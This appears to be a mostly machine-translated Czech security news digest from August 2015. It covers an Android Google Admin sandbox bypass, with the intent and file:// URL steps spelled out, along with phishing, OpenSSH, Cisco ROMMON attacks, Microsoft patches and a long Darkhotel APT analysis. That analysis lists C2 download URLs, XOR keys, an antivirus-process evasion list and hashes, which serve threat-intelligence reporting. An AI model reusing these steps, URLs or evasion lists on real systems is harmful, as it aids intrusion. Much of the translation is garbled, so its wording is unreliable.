Zero Day v Android Google App správce může obejít Sandbox

14.8.2015 Zranitelnosti

Android bezpečnostní tým společnosti Google má rušný měsíc. Nejprve zranitelnosti Tréma vynořily minulý měsíc těsně před černém klobouku a nyní vědci z laboratoří MWR vydali informace o unpatched zranitelnost, která umožňuje útočníkovi obejít Android pískoviště. Tato chyba zabezpečení spočívá ve způsobu, jakým aplikace Google správce na Android telefony zpracovává některé adresy URL. Pokud jiná aplikace v telefonu odesílá App admin specifický druh adresy URL útočník může obejít stejný původ politiky a získat data od správce karantény. "Problém byl nalezen, když aplikace Google správce obdržel adresu URL prostřednictvím IPC volání z jiných aplikací na stejném zařízení. Aplikace Správce by načíst tuto adresu URL v WebView v rámci své vlastní činnosti. Pokud útočník použil file: // URL souboru, který se kontrolované, pak je možné použít symbolické odkazy, aby se vyhnula stejný původ politiku a načíst data ven z pískoviště Google správce, dále jen "poradní říká z MWR Labs. Útočník může zneužít tuto chybu zabezpečení tím, že se nebezpečný app na telefonu oběti. MWR Labs oznámeny Google zranitelnost v březnu a Google vzala na vědomí zprávu hned, a později řekl, že bude mít záplatu připravený do června. Ale oprava byla nikdy tlačil ven a minulý týden MWR Labs informovala Google, že to plánoval vydat jeho poradenství, která byla zveřejněna ve čtvrtek. Google neodpověděl na žádost o komentář k tomuto příběhu. Tato chyba ovlivňuje aktuální verzi aplikace, a může mít vliv na předchozí verze stejně. "Aplikace Google pro správce (com.google.android.apps.enterprise.cpanel), má exportovaný aktivitu, která přijímá navíc řetězec s názvem setup_url. To může být spuštěna libovolné aplikace na zařízení vytváří nový záměr s datovým-URI nastaveným na http: // localhost / foo a setup_url řetězec nastaven na URL souboru, že mohou zapisovat do, jako například file: // dat /data/com.themalicious.app/worldreadablefile.html, "poradní MWR říká,. "The ResetPinActivity pak načíst toto v WebView pod privilegií aplikace Google Admin." MWR říká, že dokud patch je nasazen od společnosti Google, by měli uživatelé s aplikaci Google Správce neinstalovali žádné nedůvěryhodné aplikace třetích stran, což je dobrá rada pro jakékoliv mobilní telefon uživatele.


Rodičovská kontrola pro Android? Bezplatnou nabídl Eset

14.8.2015 Zabezpečení
Betaverzi produktu Parental Control pro Android, která přináší rodičům možnosti, jak chránit své děti, aniž by je museli nepřiměřeně omezovat, představil Eset. Na půl roku dává lidem její funkce zdarma.

Novinka představuje integrovaný systém pro ochranu rodiny. Umožňuje chránit děti před internetovými hrozbami nebo nevhodnými stránkami, i když používají své vlastní mobilní zařízení. Podle výrobce je k dětem přátelský: pokud se jejich používání internetu omezí, tak nenásilným způsobem, což přispívá k zachování vzájemného respektu mezi rodiči a dětmi.

Mezi hlavními funkce aplikace Parental Control patří:

- Strážce aplikací: blokuje nevhodný obsah v závislosti na věku dítěte

- Správa času: umožňuje rodičům omezit čas, který děti mohou trávit nad hrami a nad jednotlivými aplikacemi, a to i když jsou mimo domov.

- Webový strážce: blokuje internetové hrozby na základě porovnání internetových stránek s databázemi Esetu.

- Poloha dítěte: umožňuje rodičům zjistit přesné místo, kde se jejich děti nacházejí.

"Všem rodinám, které mají o aplikaci, jsme nabídli všechny její prémiové funkce na půl roku zcela zdarma, a to bez jakýchkoli závazků,“ tvrdí Branislav Orlík, Product Manager ve společnosti Eset.

Aplikaci lze stáhnout z obchodu Google Play.


Přes zprávu se snaží vysát lidem účty

13.8.2015 Phishing
Na první pohled velmi nevinně vypadá nová podvodná zpráva, která se v Česku objevila v tomto týdnu. Podvodníci v nevyžádaných e-mailech cílí na klienty Fio banky, kterým tvrdí, že pro ně mají novou zprávu. Pokud důvěřivci skutečně na odkaz v těle e-mailu kliknou, může dojít k zavirování jejich počítače.
Internetové bankovnictví Fio banky

Internetové bankovnictví Fio banky
„Zaznamenali jsme vlnu podvodných e-mailů, které se tváří, jako by byly zasílány Fio bankou. Obsahují naše logo a vyzývají adresáta k prokliku na podvodnou doménu. Jedná se o phishingové útoky, které zneužívají naše jméno a cílí na osobní údaje adresátů,“ varovali zástupci banky.

Zpráva na první pohled vypadá velmi věrohodně. Nechybí v ní logo banky a krátký text navíc neobsahuje prakticky žádné pravopisné chyby. Snadno zmást se tak mohou nechat i jinak obezřetní uživatelé.

Mohlo by dojít k zavirování počítače, případně následně ke zneužití osobních údajů.
zástupci Fio banky
I proto zástupci Fio banky apelují na klienty, aby na odkaz ve zprávě neklikali a v případě podobných e-mailů nikdy nestahovali žádné přílohy. „Mohlo by dojít k zavirování vašeho počítače, případně následně ke zneužití vašich osobních údajů. Podvodníci se tak snaží získat vaše citlivá data, aby poté získali přístup k vašemu internetovému bankovnictví,“ stojí v doporučení banky.

„Fio banka svým klientům nikdy neposílá e-maily, ve kterých vyžaduje prokliknutí na neznámé odkazy, a nevybízí ke stahování podezřelých aplikací. Klienty kontaktujeme prostřednictvím autorizované služby Fio servis v internetovém bankovnictví. Informace o nových produktech a službách, změnách ceníku či sazebníku pak zasíláme klientům do zprávy v Internetbankingu,“ doplnili zástupci banky.

Podvody zaměřené na klienty bank
V případě, že klienti mají podezření, že s podvodným e-mailem měli co dočinění a škodlivý kód si do počítače stáhli, měli by neprodleně kontaktovat svoji banku.

Podobné triky počítačových pirátů nejsou v tuzemsku nijak výjimečné. Na konci července například Česká spořitelna varovala před neustále se množícími podvody na Facebooku. I prostřednictvím této sociální sítě se totiž počítačoví piráti snaží dostat na cizí bankovní účty.


OpenSSH 7.0 Fixes Four Flaws

13.8.2015

A new version of OpenSSH has been released, fixing four security vulnerabilities and a number of non-security related bugs. OpenSSH 7.0 includes patches for a use-after-free vulnerability and three other flaws, two of which only affect Portable OpenSSH. The maintainers of the software also gave users notice that the next version of the software would deprecate several old ciphersuites and cryptographic algorithms that are no longer considered safe. One of the vulnerabilities patched in version 7.0 is an issue with the way OpenSSH handles some authentication requests. “By specifying a long, repeating keyboard-interactive “devices” string, an attacker could request the same authentication method be tried thousands of times in a single pass. The LoginGraceTime timeout in sshd(8) and any authentication failure delays implemented by the authentication mechanism itself were still applied,” the release notes say. One of the bugs that affects only Portable OpenSSH is a use-after-free that could lead to remote code execution. “Fixed a use-after-free bug related to PAM support that was reachable by attackers who could compromise the pre-authentication process for remote code execution,” the advisory says. The second vulnerability in Portable OpenSSH also could lead to remote code execution. “Fixed a privilege separation weakness related to PAM support. Attackers who could successfully compromise the pre-authentication process for remote code execution and who had valid credentials on the host could impersonate other users,” the advisory says. In OpenSSH 7.1, the maintainers plan to remove a number of problematic cryptographic algorithms and ciphers. Among the changes to be made are: * Refusing all RSA keys smaller than 1024 bits (the current minimum is 768 bits) * Several ciphers will be disabled by default: blowfish-cbc, cast128-cbc, all arcfour variants and the rijndael-cbc aliases for AES. * MD5-based HMAC algorithms will be disabled by default. In the just-released version 7.0, there are a number of cryptographic changes, as well. The software disables 1024-bit diffie-hellman-group1-sha1 key exchange by default and also drops support for the old SSH version 1 protocol.


Facebook Awards $100,000 for New Class of Vulnerabilities and Detection Tool

13.8.2015

Facebook tonight awarded a $100,000 prize to a team of Georgia Tech researchers who found a new class of browser-based memory-corruption vulnerabilities and built a corresponding detection technique. The award brings the social media giant on par with Microsoft and its six-figure payouts for mitigation bypasses and new defensive techniques for those bypasses. The award, Facebook’s Internet Defense Prize, was handed out at the USENIX Security Symposium in Washington, D.C., and doubles last year’s inaugural payout of $50,000. The prize is an effort to recognize and fund Internet security research in the areas of defense and protection, Facebook said. Security research in general celebrates offensive research and less attention is paid to people doing the nitty-gritty work required to keep systems safe and whole classes of vulnerabilities less likely to occur,” said Facebook security engineering manager Ioannis Papagiannis. “We look at work targeting meaningful bugs affecting a lot of people on the Internet.” Georgia Tech Ph.D. students Byoungyoung Lee and Chengyu Song, and professors Taesoo Kim and Wenke Lee are this year’s winners. Their paper, “Type Casting Verification: Stopping an Emerging Attack Vector,” explains a newly discovered class of C++ vulnerabilities and introduces CaVeR, a runtime bad-casting detection tool. “It performs program instrumentation at compile time and uses a new runtime type tracing mechanism—the type hierarchy table—to overcome the limitation of existing approaches and efficiently verify type casting dynamically,” the researchers wrote in describing CaVeR. Papagiannis said Facebook hopes the reward money incentivizes the researchers to continue working CaVeR and make it accessible and reusable on a greater scale. “They are targeting a real-world security problem that has been used to attack high-profile vulnerabilities,” he said, pointing to a 2013 Chrome type confusion exploit. “This addresses an important problem.” Type casting, the researchers said, is important in enabling polymorphism in C++ programming in particular. “However, if not correctly used, it may return unsafe and incorrectly casted values, leading to so-called bad-casting or type-confusion vulnerabilities,” the researchers wrote. “Since a bad-casted pointer violates a programmer’s intended pointer semantics and enables an attacker to corrupt memory, bad-casting has critical security implications similar to those of other memory corruption vulnerabilities. Despite the increasing number of bad-casting vulnerabilities, the bad-casting detection problem has not been addressed by the security community.” Facebook’s Papagiannis said in a statement that C++ supports static and dynamic casts; static casts are preferred for performance reasons. “People typically prefer to use static casts because they avoid that overhead, but if you cast to the wrong type using a static cast, the program may end up creating a pointer that can point past the memory allocated to a particular object,” Papagiannis said. “That pointer can then be used to corrupt the memory of the process.” CaVeR has already paid dividends for the security community; with it, the researchers found two bad casts in Firefox and another nine in libstdc++, the GNU standard C++ library used in the Chrome browser; the vulnerabilities have since been patched. Last year, Facebook paid $50,000 to Johannes Dahse and Thorsten Holz of Ruhr University in Bochum, Germany for their paper, “Static Detection of Second-Order Vulnerabilities in Web Applications.” Papagiannis said Facebook will meet Dahse and Holz a month from now in London to assess the progress they’ve made on their defensive tool and whether Facebook would consider using it internally. Papagiannis points out that Facebook makes no claims on any of the research and encourages teams to share their work with the greater community outside of academia. Payouts of that size have been rare from reward programs. Microsoft’s defense prize, known as the Blue Hat Prize, paid out $200,000 in the summer of 2012 to a Columbia University PhD candidate for his ROP mitigation technology. It has also paid out six-figure prizes to researchers for mitigation bypasses, the most recent being a $125,000 award to HP’s Zero Day Initiative team for new vulnerabilities that enable ASLR bypass; Microsoft said it would not patch the bugs because they did not affect enough users, prompting HP in June to disclose full details and proof of concept code. The mitigation bypass bounty was launched in June 2013 and featured a $100,000 prize for exploit techniques that bypass Windows mitigations such as DEP, ASLR, SEHOP and others.


Black Hat: Android má v sobě závažnou chybu

13.8.2015 Konference
Zranitelnost Certifi-gate nalezená v nástrojích mobile Remote Support Tools (mRST), které jsou v podstatě ve všech verzích Androidu a které se využívají mohou útočníci využít pro neomezený přístup k zařízení,ke krádežím osobních údajů a další nekalé operace.

Chyba, kterou objevili analytici Check Pointu, ovlivňuje zařízení významných výrobců, včetně společností LG, Samsung, HTC a ZTE.

„Certifi-gate“ je zranitelnost, která umožňuje aplikacím získat nelegitimní privilegovaná přístupová práva, která jsou obvykle používána pro vzdálenou podporu aplikací (předinstalovaných aplikací i nainstalovaných uživateli).

Útočníci mohou zneužít Certifi-gate pro neomezený přístup k zařízení a mohou krást osobní údaje, sledovat polohu zařízení, zapnout mikrofony pro záznam rozhovorů a provádět řadu dalších akcí s infikovaným zařízením.

Všichni dotčení prodejci začali uvolňovat aktualizace. Zranitelnost nelze opravit, jedinou možností je provést aktualizaci zařízení, což je poměrně pomalý proces. Android nenabízí žádný způsob, jak zrušit certifikáty používané k podpisu zranitelných pluginů.

Uživatelé mobilních zařízení se systémem Android si mohou ověřit, jestli je jejich zařízení ohroženo zranitelností Certifi-gate prostřednictvím bezplatné skenovací aplikace Certifi-gate Scanner na Google Play.


Cisco Warns Customers About Attacks Installing Malicious IOS Bootstrap Images

12.8.2015

Cisco is warning enterprise customers about a spike in attacks in which hackers use valid credentials on IOS devices to log in as administrators and then upload malicious ROMMON images to take control of the devices. The ROM Monitor is the program that initializes the hardware and software on IOS devices, and an attacker who is able to install a modified, malicious image would have persistent access to the compromised device. Cisco’s security team has been contacting customers to warn them about the attacks, which are ongoing. A key component of the attacks is that the attacker needs to have valid administrator-level credentials in order to access the device. There is no underlying vulnerability that the attackers are exploiting. They are somehow harvesting admin credentials and then using them to install the malicious ROMMON images. “Cisco PSIRT has contacted customers to describe an evolution in attacks against Cisco IOS Classic platforms. Cisco has observed a limited number of cases where attackers, after gaining administrative or physical access to a Cisco IOS device, replaced the Cisco IOS ROMMON (IOS bootstrap) with a malicious ROMMON image,” the advisory from Cisco says. “In all cases seen by Cisco, attackers accessed the devices using valid administrative credentials and then used the ROMMON field upgrade process to install a malicious ROMMON. Once the malicious ROMMON was installed and the IOS device was rebooted, the attacker was able to manipulate device behavior. Utilizing a malicious ROMMON provides attackers an additional advantage because infection will persist through a reboot.” The ability to install new ROMMON images on IOS devices is an expected capability for users with admin privileges. Cisco says that there is no plan to issue a CVE related to these attacks, because of the lack of a vulnerability.


Útoky Darkhotel v roce 2015

12.8.2015 APT

Darkhotel APT útoky datem 2014 a starší jsou charakterizované zneužití odcizených certifikátů, nasazení HTA souborů s více technik a použití neobvyklých metod, jako je infiltrace hotelového Wi-Fi připojení na internet umístit zadní vrátka v systémech terčů. V roce 2015, mnoho z těchto technik a činností zůstanou v použití. Nicméně, kromě nových variant škodlivého HTA, najdeme nové oběti, .rar příloh s RTLO spearphishing a nasazení 0 den od Hacking Team.

Darkhotel APT pokračuje spearphish cíle po celém světě, s širším geografickém dosah, než jeho předchozí botnet buildout a hotelové Wi-Fi útoků. Některé z těchto cílů jsou diplomatické nebo máte strategické obchodní zájmy.

Umístění cílů a obětí Darkhotel se v roce 2015:

Severní Korea
Rusko
Jižní Korea
Japonsko
Bangladéš
Thajsko
Indie
Mosambik
Německo
2015 Darkhotel HTA a backdoor související využívat související a C2 místa:

storyonboard [.] net
tisone360 [.] org
openofficev [.] info
saytargetworld [.] net
error-page [.] net
eonlineworld [.] net
enewsbank [.] net
thewordusrapid [.] cz
2015 spearphishing Incident název přílohy podmnožina:

harmonogram (6.1 ~ 6) .rar -?> plán (6,1 ~ 6) _ gpj.scr
harmonogram (2.11 ~ 16) .rar -?> plán (2.11 ~ 16) _ gpj.scr
congratulation.rar -?> congratulation_ gpj.scr
letter.rar -?> letter_ gpj.scr
Důsledné využívání popletl HTA stahují

Ať už se infekce je dosaženo prostřednictvím spearphishing, fyzický přístup k systému nebo 0den Hackerství týmu Flash, tam často se zdá být běžnou metodou pro nově infikované systému komunikovat s Darkhotel je C2:

Lehce zatemnil (double unikl sada JavaScript hodnoty proměnných) skript udržována v rámci HTA souboru zapíše spustitelný na disk a spustí jej.

Je zajímavé, že tento konkrétní skupina má už léta nasazených backdoor a downloader kód ve formě HTA souborů. V roce 2010 jsme pozorovali to re-purposing články o Severní Koreji americkým think-tanku Brookings Institute, s cílem zaútočit severokorejského související cíle se škodlivým kódem pohřben v HTA soubory . To také e-mailem odkazy na jeho škodlivých HTA soubory na severokorejských turistických skupin, ekonomové se zájmem v Severní Koreji, a další. Je to poněkud zvláštní vidět takovou těžkou závislost na starší technologii Windows-specifické, jako je HTML aplikací, zavedených společností Microsoft v roce 1999 .

Z nedávné sendspace.servermsys.com/downloader.hta:

Útoky Darkhotel v roce 2015

Útoky Darkhotel v roce 2015

Po popravě a útěku několik proměnných, HTA používá starověké ADODB.Stream komponenty, aby vypsat řetězec ve spojení XOR s 0x3d jako spustitelný soubor a spustí jej.

Útoky Darkhotel v roce 2015

Útoky Darkhotel v roce 2015

Tento kód vede v provedení "internet_explorer_Smart_recovery.exe" 054471f7e168e016c565412227acfe7f, a skryté okně prohlížeče telefonování zpět do C2. V tomto případě se zdá, že operátoři Darkhotel jsou kontroly jako na tom, zda oběti výchozí prohlížeč Internet Explorer, protože všechny verze IE vrátí hodnotu "0" a ostatní prohlížeče odejít "appMinorVersion" nedefinovaný. Tento sběr údajů se zdá poněkud zvláštní, protože HTA soubory jsou podporovány a provozují Mshta.exe na systémech Windows pouze, stále dodaných s operačním systémem Windows 8. Možná je to artefakt od začátku vývoje kódu. Zde je novější verze:

"Hxxp:? //sendspace.servermsys.com/readme.php Type = popravu & výsledek = created_and_executed & info =" + navigator.appMinorVersion + "

Útoky Darkhotel v roce 2015

Útoky Darkhotel v roce 2015

Soubor "internet_explorer_Smart_recovery.exe" je jednoduchý popletl downloader. Série XOR 0x28 smyček dešifrovat obsah dávkového souboru self-vymazání, který je pak napsán na disk a popraven. Později v provedení, složitější rc4 smyčka dešifruje stažení adres URL a dalších řetězců a dovozu.

Útoky Darkhotel v roce 2015

Útoky Darkhotel v roce 2015

Po dokončení, toto URL řetězec dešifrování a connectback vypadá
http://sendspace.servermsys.com/wnctprx. Soubor se stáhne (b1f56a54309147b07dda54623fecbb89) na "TMP" soubor v% temp%, popraven, a downloader východy. Tento větší soubor je backdoor / downloader, který obsahuje funkce ssh, a kapky své klíče na disk pro interakci ssh. Najdeme starší Darkhotel informace zloděje klesl a běží na systému těmito stahují.

Spearphishing a .rar Přílohy s RTLO

Darkhotel APT bude vytrvale spearphish konkrétní cíle, aby mohl úspěšně ohrozit systémy. Některé cíle jsou spearphished opakovaně s hodně stejný sociálně-inženýrské schémat. Například, příloha "plán (2.11 ~ 16) .rar" může být poslán 10.února, s Darkhotel vracet ke stejným cílům na konci května pro druhý pokus s upevňovací "plánu (6,1 ~ 6) .rar".

Útoky Darkhotel v roce 2015

Útoky Darkhotel v roce 2015

Je důsledně archivuje RTLO SCR spustitelné soubory se v .rar archivu, aby se objeví na cíl jako neškodných JPG souborů. Tyto spustitelné soubory jsou lite kapátka, zachování těchto vějička souborů JPEG, a kód pro vytvoření LNK downloader.

Útoky Darkhotel v roce 2015

Útoky Darkhotel v roce 2015

Když cílový pokusí otevřít, co si myslí, že je soubor jpg image, spustitelný kód běží a upustí jpg image na disk, a pak jej otevře s mspaint.exe v pozadí. Tato "gratulace" dokument je v korejštině, odhaluje pravděpodobnou charakteristiku zamýšleného cíle.

Útoky Darkhotel v roce 2015

Útoky Darkhotel v roce 2015

Zatímco je zobrazen obraz, kód klesne neobvyklou mspaint.lnk zástupce na disk a spustí jej. Zástupce udržuje víceřádkové cílový skript. Tato technika je také používán jinými APT jako vytrvalost mechanismy, jak dokumentuje naši Mandiant kolegy . Soubor 64KB lnk je downloader kód:

Útoky Darkhotel v roce 2015

Útoky Darkhotel v roce 2015

Když je spuštěn tento LNK souborů, začne s AJAX založený proces stahování pro "unzip.js" souboru (a07124b65a76ee7d721d746fd8047066) na openofficev.info. To je další soubor wscript provádění AJAX stáhnout a spustit poměrně velký kompilovaný spustitelný:

Útoky Darkhotel v roce 2015

Útoky Darkhotel v roce 2015

Tento spustitelný kód je uložen do% temp% \ csrtsrm.exe a popraven tam. Je to poměrně velký spustitelný soubor (~ 1,2 MB), který vstřikuje škodlivý kód a založí vzdálených závity do legitimních procesů.

Ukradené certifikáty a únikům

Skupina se zdá udržovat zásoby ukradených certifikátů a nasazuje své stahovače a zadní vrátka podepsané s nimi. Některé z více nedávných odvolaných certifikátů patří ty, které patří k Xuchang Hongguang Technology Co. Ltd.

Darkhotel nyní má tendenci skrývat svůj kód za vrstev šifrování. Je pravděpodobné, že to pomalu přizpůsoben útočení lépe bránil prostředí a nechce pálit tyto ukradené digitální certifikáty. V předchozích útoků by to prostě využili dlouhého seznamu realizovaných slabě, rozbité certifikátů.

Nejen, že jsou jeho mlžení techniky stává silnější, ale jeho seznam technologie anti-detekce roste. Například tento podepsal Downloader (d896ebfc819741e0a97c651de1d15fec) dešifruje soubor anti-malware řetězce v etapách k identifikaci obranné technologie na nově infikovaným systémem, a pak otevře každý proces, hledal jméno odpovídající obrázek:

c: \ avast! sandbox \ WINDOWS \ system32 \ kernel32.dll - Avast!
Avp.exe - Kaspersky Lab
mcagent.exe; mcuicnt.exe - Intel / McAfee
bdagent.exe - BitDefender
ravmon.exe, ravmond.exe - Peking Rising
360tray.exe, 360sd. exe, 360rp.exe, exeMgr.exe - Qihoo 360
ayagent.aye, avguard,. avgntsd.exe - Avira Antivirus
ccsvchst.exe, nis.exe - Symantec Norton
avgui.exe, avgidsagent.exe, avastui.exe, avastsvc.exe ! - Avast
msseces.exe; msmpeng.exe - Microsoft Security Essentials a Microsoft Anti-Malware Service
AVK.exe; AVKTray.exe - G-Data
avas.exe - TrustPort AV
tptray.exe - Toshiba utility
fsma32.exe; fsorsp.exe - F-Secure
econser.exe; escanmon.exe - mikrosvět Technologies eScan
SrvLoad.exe; PSHost.exe - Panda Software
egui.exe; ekrn.exe - ESET Smart Security
pctsSvc.exe; pctsGui.exe - PC Tools Spyware Doctor
CASC. exe, UmxEngine.exe - CA Security Center
cmdagent.exe; cfp.exe - Comodo
KVSrvXP.exe; KVMonXP.exe - Jiangmin Antivirus
nsesvc.exe; CClaw.exe - Norman
V3Svc.exe - AhnLab
guardxup. - IKARUS
FProtTray. - F-Prot
op_mon - Agnitum Outpost
vba332ldr, dwengine.. - DrWeb

Dokonce i identifikační informace, které backdoor hledá od systému není dešifrovány do běhu. Stejně jako "informační a zloděj" složky popsanou v našem předchozím technické zprávě Darkhotel , tato složka se snaží ukrást sadu dat, s nimiž identifikovat infikovaný systém. Většina informací jsou shromažďovány se stejným souborem hovorů, tj kernel32.GetDefaultSystemLangID, kernel32.GetVersion, a kernel32.GetSystemInfo:

Výchozí systém codepage
Informace o Síťový adaptér
Architektura procesoru
Hostname a IP adresa
Windows OS a Service Pack verze
V podstatě, hodně z tohoto informací zloděj kód je stejný jako bylo pozorováno v předchozích útoků.

Tisone360.com, Návštěvy, a Hacking Team Flash 0 dnů

Tisone360.com místo bylo obzvláště zajímavé pro nás. V dubnu 2015 byl Darkhotel email-phishing s odkazy na dřívější (CVE-2014) Flash exploity, a pak, na začátku července, to začalo distribuovat to, co je údajně unikly Hacking Team Flash 0 dnů.

Vypadá to, že Darkhotel APT může byli s použitím unikly HackingTeam Flash 0 dnů, aby se zaměřují na specifické systémy. Můžeme se otočit z "tisone360.com" identifikovat některé z této činnosti. Místo bylo vzhůru a aktivní jako pozdní na 22 červenci 2015. Nicméně, to vypadá, že malá část její činnosti. Kromě icon.swf HT 0den (214709aa7c5e4e8b60759a175737bb2b), to vypadá, jako kdyby "tisone360.com" místo bylo dodávat Flash CVE-2014 - 0497 využívat v dubnu, jsme nahlásili související zranitelnost Adobe v lednu 2014, kdy ji byl používán Darkhotel APT.

V poslední době, Darkhotel APT udržuje více pracovních adresářů na této stránce.

Útoky Darkhotel v roce 2015

Útoky Darkhotel v roce 2015

Je to adresář ims2, že je nejvíce aktivní. Obsahuje sadu zadní vrátka a využije. Nejzajímavější z nich je hlášena Hacking Team Flash 0 dnů, icon.swf. Ve dnech následujících po veřejné zmínka o tomto serveru, posádka se pomalu zpřísnila dolů otevřený přístup k / ims2 /. Ať tak či onak, obsah i nadále aktivně používat.

icon.swf (214709aa7c5e4e8b60759a175737bb2b) -> icon.jpg (42a837c4433ae6bd7490baec8aeb5091)
->% temp% \ RealTemp.exe (61cc019c3141281073181c4ef1f4e524)

Po icon.jpg je stažen bleskem zneužít, je dekódovat pomocí multi-byte XOR klíče 0xb369195a02. Poté stáhne další komponenty.

Je zajímavé, že skupina se zdá být mění kompilace a linker časová razítka jeho spustitelného kódu daty v roce 2013. Vidíme to na více vzorků nasazených a pozorovaných poprvé v polovině-2015, včetně icon.jpg Downloader.

Útoky Darkhotel v roce 2015

Útoky Darkhotel v roce 2015

Log návštěv adresáře webu zaznamenává, že adresář byl zřízen 8. července. Hrstka návštěv konkrétní adresu URL na serveru z pěti systémů založených na těchto místech byly zaznamenány na 8. a 9.. Některé z nich jsou pravděpodobně Darkhotel APT cíle:

Německo
Jižní Korea
Čína (pravděpodobně výzkum)
USA
Japonsko
Nicméně, jeden z těchto systémů zabušil místo na 9., hostující téměř 12.000 krát za 30 minut. Tento objem dopravy je pravděpodobné, že reprezentovat hlučnou pokus o skenování výzkumu a ne někoho, kdo DoS'ing stránky:

Útoky Darkhotel v roce 2015

Útoky Darkhotel v roce 2015

Zaznamenané návštěvy na místě po 9. budou pravděpodobně nespolehlivé a mohou být více výzkumníků, reagovat na rostoucí proslulosti lokality v návaznosti na veřejné zprávy o 9.. Mnoho z těchto přibližně 50 návštěv pocházejí z podmnožiny uvedených systémů a jsou opakovány vícekrát. Návštěvy z následujících umístění došlo na nebo po 10.:

Německo (pravděpodobně výzkum)
Ukrajina (pravděpodobně výzkum)
Amazon Web Services, na více místech (pravděpodobně bude výzkum)
Googlebot, více míst
USA
Irsko (pravděpodobně výzkum)
Rusko
Brazílie
Čína
Finsko
Kanada
Tchaj-wan
Francie (pravděpodobně výzkum)
Česká republika
Konzistentní útok průtoku

Skupina Darkhotel má tendenci držet se toho, co funguje. Například pro léta viděli jsme opakovat využití spearphishing cíle přímo s HTA soubory. Nyní, jak se tisone360.com místa výše, jsme viděli opakovaném použití v roce 2015 z tvůrčího řetězce dodávky sad.

downloader -> hta Checkin -> info zloděj. -> více sestavené součástky
kapátkem -> WSH script -> WSH script -> info zloděj -> více sestavené součástky
spearphish -> kapátkem -> hta Checkin -> downloader -> info zloděj

Zatímco řetězec dodávky, která zahrnuje obfuscated skripty v rámci HTA soubory, nastal již v roce 2011 se zdá, že objem zvedl v roce 2014 a nyní 2015.

openofficev [.] info (2015)
office-revize [.] KOM (2014)
online.newssupply [.] net (2011)

Skrytí infrastruktura v očích

Skupina je nyní více ostražití při udržování svých stránek, zpřísnění konfiguraci a obsah odpovědi. Právě teď, jeho c2 reaguje s anti-hrdina obrazy "Drinky Crow" z alt Maakies karikatura:

Útoky Darkhotel v roce 2015

Útoky Darkhotel v roce 2015

Ostatní Darkhotel C2S mají tendenci splynout s náhodnými stránek na webu, když jsou navštěvovány nesprávné nebo chybějící stránky. Jsou ripování obrázků buď z fotolia nebo články o řemeslné zmrzliny tvůrce zde:

Útoky Darkhotel v roce 2015

Útoky Darkhotel v roce 2015

Technické detaily

HTA md5:

021685613fb739dec7303247212c3b09
1ee3dfce97ab318b416c1ba7463ee405
2899f4099c76232d6362fd62ab730741
2dee887b20a06b8e556e878c62e46e13
6b9e9b2dc97ff0b26a8a61ba95ca8ff6
852a9411a949add69386a72805c8cb05
be59994b5008a0be48934a9c5771dfa5
e29693ce15acd552f1a0435e2d31d6df
fa67142728e40a2a4e97ccc6db919f2b
fef8fda27deb3e950ba1a71968ec7466

Spearphish přílohy md5:

5c74db6f755555ea99b51e1c68e796f9
c3ae70b3012cc9b5c9ceb060a251715a
560d68c31980c26d2adab7406b61c651
da0717899e3ccc1ba0e8d32774566219
d965a5b3548047da27b503029440e77f
dc0de14d9d36d13a6c8a34b2c583e70a
39562e410bc3fb5a30aca8162b20bdd0 (Poprvé spatřen pozdní 2014, který se používá do 2015)
e85e0365b6f77cc2e9862f987b152a89 (nejprve viděný pozdní 2014, který se používá do 2015)

2015 velké downloader md5:

5e01b8bc78afc6ecb3376c06cbceb680
61cc019c3141281073181c4ef1f4e524
3d2e941ac48ae9d79380ca0f133f4a49
fc78b15507e920b3ee405f843f48a7b3
da360e94e60267dce08e6d47fc1fcecc
33e278c5ba6bf1a545d45e17f7582512
b1f56a54309147b07dda54623fecbb89
009d85773d519a9a97129102d8116305

Infostealers klesl v roce 2015

61637a0637fb25c53f396c305efa5dc5
a7e78fd4bf305509c2fc1b3706567acd

Subhosts a adresy URL:

tisone360.com/img_h/ims2/icon.swf
tisone360.com/img_h/ims2/1.php
tisone360.com/img_h/ims2/icon.jpg
tisone360.com/noname/img/movie.swf
tisone360.com/noname/minky/face.php
tisone360.com/htdoc/ImageView.hta
tisone360.com/htdoc/page1/page.html
daily.enewsbank.net/wmpsrx64
daily.enewsbank.net/newsviewer.hta
saytargetworld.net/season/nextpage.php
sendspace.servermsys.com/wnctprx
error-page.net/update/load.php
photo.storyonboard.net/wmpsrx64
photo.storyonboard.net/photoviewer.hta
photo.storyonboard.net/readme.php
unionnewsreport.net/aeroflot_bonus/ticket.php
www.openofficev.info/xopen88/office2
www.openofficev.info/dec98/unzip.js
www.openofficev.info/open99/office32
www.openofficev.info/decod9/unzip.js


Microsoft Security Aktualizace 08. 2015
12.8.2015 Zranitelnosti

Microsoft vydává nová dávka čtrnácti aktualizací zabezpečení záplatování přes padesát zranitelnosti dnes, s jedním z nich je známo, že bude zneužit v cílených útoků. Velký počet zranitelností byly hlášeny výzkumníky z Google a jejich projektu Zero a iniciativu HP Zero Day. Mezitím, reflexní diskuse o hodnotě těchto útočných týmů je stanoven na offsec e-mailové konference .

V současné době využívána in-the-volné přírodě, MS15-085 "Chyba zabezpečení ve Správci hoře umožňuje zvýšení úrovně oprávnění", umožňuje útočníkovi vypsat spustitelný soubor na disk a spustit jej z vložení USB disku. Využití je v použití jako součást omezených cílených útoků. Zdá se, Aktualizace instalace a údržba, aby se velkou zakázku tady, protože Microsoft zahrnuje jedinečné doporučení s ním: "Pokud instalujete jazykovou sadu po instalaci této aktualizace, je třeba přeinstalovat tuto aktualizaci." Nejen, že je "Mountmgr.sys" jsou uvedeny několik set krát v tomto souvisejícím znalostní báze , ale více než sto ostatní soubory jsou dotkl s touto větší aktualizace. A nejen je Microsoft lodní kód zblízka zranitelnosti, oni jsou také lodní novou událost pro protokolu událostí, určit související využít pokusy, "Jako součást aktualizace, jsme také lodní protokolu událostí na pomoc obráncům odhalit pokusy použít tuto chybu zabezpečení svých systémů ". ID události 100: MountMgr "CVE-2015-1769" budou zaznamenány systémem Windows pro referenci.

Nový okraj webový prohlížeč udržuje tři "Korupce paměti" slabá místa. Typicky, když tyto vzniknou v internetových prohlížečích Microsoft, nedostatky byly problémy use-po-bez. Tyto problémy poškození paměti překvapivě umožnit vzdálené spuštění kódu v systému Windows 10: CVE-2015-2441 CVE-2015-2442 CVE-2015-2446 a jeden problém ASLR bypass. Zatímco kód základna je menší, rychlejší, a novější než IE, tyto problémy nadále se vyskytnout v jejich nejnovější kódu.

Více o srpnu 2015 bulletinů Microsoft lze nalézt zde , prosím, aktualizujte svůj systém co nejdříve.


Rush pro Windows 10 infikuje počítače s Spy Trojan
12.8.2015 Viry

